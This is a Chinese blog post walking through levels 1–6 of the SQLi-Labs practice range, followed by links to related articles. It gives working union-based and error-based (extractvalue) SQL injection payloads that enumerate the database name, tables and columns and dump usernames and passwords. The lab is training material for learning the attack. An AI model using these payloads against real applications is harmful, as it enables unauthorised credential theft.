Sqlilabs靶场报错注入:less1~6

已于 2024-08-05 18:19:40 修改
阅读量369 收藏 4
点赞数 4
文章标签: sql 数据库 mybatis
于 2024-08-05 18:08:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ningwangh/article/details/140927592
版权

报错注入:

less-1:报错后的GET单引号字注入

        首先做SQL注入,需要知道注入参数是什么,不是所有的参数都是id,也能是file等等。判断注入点,注入点很重要,如果找不到注入的地方,测试什么参数都是在浪费时间。

进入后的首页面就是这样,提示我们输入一个ID

在这里我输入了id=1,显示出这个结果,说明并没有对用户的输入做过滤

获取列数做联合查询:

?id=1 order by 3-- +
输入3时并没有报错,输入4时出现了错误,说明列数是3
?id=1 order by 4-- +

对其做连表查询:

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=1union%20select%201.2,3

发现与上面用id=1的结果相同,应该是没有逃脱出单引号的控制,应该去闭合单引号,而单引号需要成对出现。

解决单引号需要成对出现:

        1、闭合

        2、注释 --  #   */  /***/

通过测试发现#不能直接使用,会被直接编译掉,导致不能生效,我们可以将#编码为%23使用

下一步,获得数据库名,表名,列名,数据

为了让union select前面的参数查不出来,所以id=-1

获取库名:

?id=-1' union select 1,2,database() --+

获取表名:

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database() -- +

获取列名:

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users' and table_schema='security'--+

获取数据:

?id=-1' union select 1,2,group_concat(username ,0x7e, password) from users--+

ok,less1 完成。

less-2:数字型注入

与less-1基本相同,没有单引号闭合:

获取库名:

?id=-1 union select 1,2,database() --+

获取表名:

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database() --+

获取列名:

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users' and table_schema='security'--+

获取数据:

?id=-1 union select 1,2,group_concat(username ,0x7e, password) from users--+

ok,完成。

less-3:与less-1没什么不同,在'之后加上)即可

?id=-1') union select 1,2,group_concat(username ,0x7e, password) from users--+

其余与less-1没有不同。

less-4:使用了双引号加括号用来闭合语句

?id=-1") union select 1,2,group_concat(username ,0x7e, password) from users--+

ok,完成。

less-5:

输入id=1,显示 you are in ........

报错没有回显:

随便输入一个错误id=100,显示与前几关不同,说明输入是为了检测是否存在这个id

输入?id=0',会显示错误,表示存在注入点,且使用'闭合

获取库名:

?id=0' union select extractvalue(1,concat(';',database())) --+



获取表名:

?id=0' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~')) --+

获取列名:

?id=0' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),'~')) --+

获取数据:

?id=0' and extractvalue(1,concat('~',(select group_concat(concat_ws(':',username,password)) from security.users),'~')) --+

从结果来看,未能获取全,可以先获取username在获取password

username:

password:

ok,完成。

less-6:闭合方式为"

与less-5除了闭合方式不同外,其它都一样

?id=0" and extractvalue(1,concat('~',(select group_concat(concat_ws(':',username,password)) from security.users),'~')) --+

与less-5相同,也可以先查询username,在查询password。

ok,完成。

ningwangh
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql注入-sqlilabs靶场注入
10-15
本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLi Labs Less-1 联合注入+报错注入_sqlilabs靶场报错注入
2401_84265909的博客
05-17 752
地址栏输入:?id=1’ and 1 – a,正常显示地址栏输入:?id=1’ and 0 – a,异常(空)显示,确定注入点为:单引号字符型。
SQLi Labs Less-1 联合注入+报错注入
wangyuxiang946的博客
06-19 1万+
SQLi第一关,sqllabs less-1,sqli-labs less1
SQLi Labs Less-1 联合注入+报错注入_sqlilabs靶场报错注入(3)
2401_84265909的博客
05-17 953
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
SQLi Labs Less-1 联合注入+报错注入_sqlilabs靶场报错注入(1)
2301_76224593的博客
05-17 431
地址栏输入:?id=1’ and 0 – a,异常(空)显示,确定注入点为:单引号字符型。
基于Sqli-Labs靶场SQL注入-17~22关
Joker
01-03 1679
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
基于Sqli-Labs靶场SQL注入-1~4关
Joker
11-11 1633
这里对SQL进行了初步的讲解,主要讲解了联合注入以及一些简单的注入类型判断,后续我会更新其他系列的注入方式,例如报错注入、二分法猜解注入、时间延迟注入、导出文件字符型注入、POST类型注入等注入类型。
DAY22:sqli-labs 靶场通关wp(Less01~~Less20)
qq_49433473的博客
08-04 1047
Sqli-labs靶场 1-20关通关手册,报错注入及其详细。
sqli靶场——【Less-5】报错注入
weixin_63082823的博客
09-14 490
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a; 以上语句可以简化成如下的形式: select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
SQLi LABS Less-11 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-27 1万+
sqli第十一关,sqli-labs less-11,sqlilabs less11
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习和实践SQL注入技术而设计的靶场环境。它包含了多个关卡,每个关卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些关卡中的问题,学习者...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sqlilabs,里边赠送包含了,sqlilabs过关手册-注入天书,联系sql注入的绝佳靶场
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php,Tomcat+mysql+java(部分关卡需要) Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改...
postgresql 双重排序后 重复项 标识次序
cuisidong1997的博客
08-04 210
在这个查询中,ROW_NUMBER()会为每个product_id分组内的行分配一个唯一的sale_sequence。PARTITION BY product_id表示按product_id分组,ORDER BY sale_date表示在每个分组内按sale_date排序。最外层的ORDER BY product_id, sale_date确定了查询结果的最终排序。一个常见的方法是使用ROW_NUMBER()窗口函数,它会为每个分组内的行分配一个唯一的序号。
postgresql 分组合并 字段
cuisidong1997的博客
08-04 249
如果你想要合并的不是字符串字段,而是其他类型的字段,比如数字或日期,你也可以使用string_agg,但是需要将这些值转换为字符串。在PostgreSQL中,如果你想要将多个行的字段值合并为一个字段,你可以使用string_agg函数。这个函数可以将同一个组内的指定字段的值连接成一个字符串,并且可以自定义连接符。在这个例子中,array_agg将所有的薪资值收集到一个数组中,然后array_to_string将这个数组转换为一个由逗号分隔的字符串。postgresql 分组合并 字段。
SQL Server数据库文件过大而无法直接导出解决方案
战族狼魂的博客
08-04 268
有些第三方工具可以提供更加灵活和高效的备份和恢复功能,例如Redgate的SQL Backup,Idera的SQL Safe Backup等。如果数据库使用了文件组,则可以备份单个文件组或单个数据文件。这种方式可以让你在需要恢复时,只恢复特定的文件组或文件。SQL Server支持压缩备份,压缩后的备份文件会更小,从而减少了单个备份文件的大小。部分备份是一种备份数据库子集的方法,特别适用于具有只读文件组的大型数据库。这样,数据库的备份将被分割成多个部分存储在不同的文件中。
PostgreSQL设置主键递增
最新发布
y516369的博客
08-04 141
PostgreSQL设置主键递增
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值